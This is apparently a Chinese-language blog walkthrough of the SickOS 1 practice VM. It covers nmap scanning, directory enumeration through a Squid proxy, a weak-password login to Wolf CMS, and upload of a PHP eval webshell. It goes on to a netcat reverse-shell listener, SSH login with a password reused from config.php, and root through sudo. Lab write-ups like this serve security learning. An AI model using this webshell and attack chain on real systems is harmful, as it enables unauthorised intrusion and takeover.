sickos1

信息搜集

主机发现

1
sudo nmap -sn 192.168.145.0/24

img

确认目标ip192.168.145.136

快速的端口扫描

1
sudo nmap -sT --min-rate 10000 -p- 192.168.145.136 -oA nmapscan/ports

img

squid-http??

http-proxy??

代理?

详细信息扫描

1
2
3
grep open nmapscan/ports.nmap | awk -F'/' '{print $1}'
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
sudo nmap -sT -sV -sV -sC -O -p$ports 192.168.145.136 -oA nmapscan/detail

img

UDP扫描

1
sudo nmap -sU --top-ports 20 192.168.145.136 -oA nmapscan/udp

img

并没有什么价值

脚本扫描

1
sudo nmap --script=vuln -p$ports 192.168.145.136 -oA nmapscan/vuln 

img

没有新的信息

我们访问一下3128和8080

img

8080直接访问不了,估计是要代理访问

源码中只有一个地方有些信息,但是感觉没啥用

img

作用是调用本地的邮件处理来给管理员发信息

根据上面nmap和页面给到的squid关键词,我们来搜索一波这个是什么东西

Squid Cache(简称 Squid)是一个流行的代理服务器和 Web 缓存服务器软件。Squid 可以做正向代理,也可以做反向代理。官方网站地址为:http://www.squid-cache.org/

搜索结果说这个东西是个代理服务器

看来是3128这个端口代理了什么东西

现在的思路有两个

1、3128目录爆破

2、squid/3.1.19隧道

目录扫描

gobuster

img

dirb

img

dirsearch

img

出现了很多400

我们用3128作为代理再扫一遍

img

img

也用nikto扫一下漏洞

img

扫出来很多新东西

我们在浏览器中设置一下代理进行访问

img

img

进行访问之后发现,web存在东西了

源码中也没有什么东西

进目录看看

img

好消息,看到了个cms名字

漏洞探测

img

拼接一下目录试试,看到了一个页面

我们在搜索引擎上搜索一下wolfcms的管理员路径以及可能存在的漏洞

img

看一下这些路径,前面都有一个?,综合搜索引擎上找到的管理员路径,我们直接访问

http://192.168.145.136/wolfcms/?/admin/login

img

弱口令登录

我们可以去爆破一下密码,或者找默认口令

直接弱口令,admin admin

img

img

文件上传

发现了一个文件上传点,尝试尝试(除了这个,其他页面也有很多看样子可以利用的点,但是我觉得这个文件上传最简单)

img

观察这些路径,很容易就能推断出来上传上去的路径应该在wolfcms/public目录下

传个小马进去

1
<?php eval($_REQUEST[1]);?>

蚁剑设置代理

img

img

php代码执行

img

在page界面,点击这个

img

img

会发现它可以执行php脚本,红色部分是我加上去的,然后保存

kali建立监听

1
sudo nc -lnvvp 8800

img

当点击文章界面时,就会反弹shell

img

img

发现config.php,查看一下

发现一个账号密码,会是ssh的密码吗?或者是root账号的密码?

ssh登录

(1)root john@123 失败

(2)www-data john@123 失败
(3)sickos john@123 成功

img

img

3ALL

可以sudo,直接拿下

img


sickos1
https://zzhnohikari.github.io/2024/03/12/sickos1/
作者
John Doe
发布于
2024年3月12日
许可协议